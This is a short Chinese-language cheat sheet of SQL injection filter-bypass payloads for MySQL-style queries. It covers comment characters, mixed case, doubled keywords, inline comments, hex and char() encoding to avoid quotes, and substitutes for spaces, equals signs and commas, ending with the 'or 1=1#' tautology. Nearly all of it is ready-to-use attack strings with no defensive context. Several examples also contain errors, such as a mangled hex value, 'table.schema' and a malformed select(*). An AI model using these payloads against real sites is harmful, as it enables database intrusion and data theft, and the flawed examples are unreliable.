一、绕过策略
1.常用注释符
--+、--空格、/**/、#
2.大小写绕过
select * from admin where id=1;
select * from admin where id=1 uNiOn seLeCt 1,2,3;
3.双写绕过
select * from admin where id=1;
select * from admin where id=1 UniunionON select 1,2,3;
4.内联注释绕过
select * from admin where id=1;
select * from admin where id=1 union /*!select*/ 1,2.3;
5.单引号过滤
select * from admin where id=1;
select * from admin where id=1 union select 1,concat(table_name) from information_schema.tables where table.schema='sqli';
①16进制绕过:将sqli转换为对应的16进制
select * from admin where id=1 union select 1,concat(table_name) from information_schema.tables where table.schema=0x73716c69a;
②char函数绕过
select * from admin where id=1 union select 1,concat(table_name) from information_schema.tables where table.schema=char(115)+char(113)+char(108)+char(105);
6.空格过滤
select * from admin where id=1;
①括号绕过(查什么、在哪查、条件)
select(*)from(admin)where(id=1);
②注释绕过
select/**/*/**/from/**/admin/**/where/**/id=1;
③其他空格字符绕过
tab、换行
7.等号过滤
select * from admin where username='admin';
①like or rlike
select * from admin where username like 'admin';
select * from admin where username rlike 'admin';
②beetween and
select * from admin where username between 'admin' and 'admin';
③regexp
select * from admin where username regexp 'admin';
8.逗号过滤
①select substr('admin',1,1);
select substr('admin' from 1 for 1);
②select * from admin limit 0,1;
select * from admin limit 0 offset 1;
二、
or 1=1# :可用于显示所有字段,因为where语句永远成立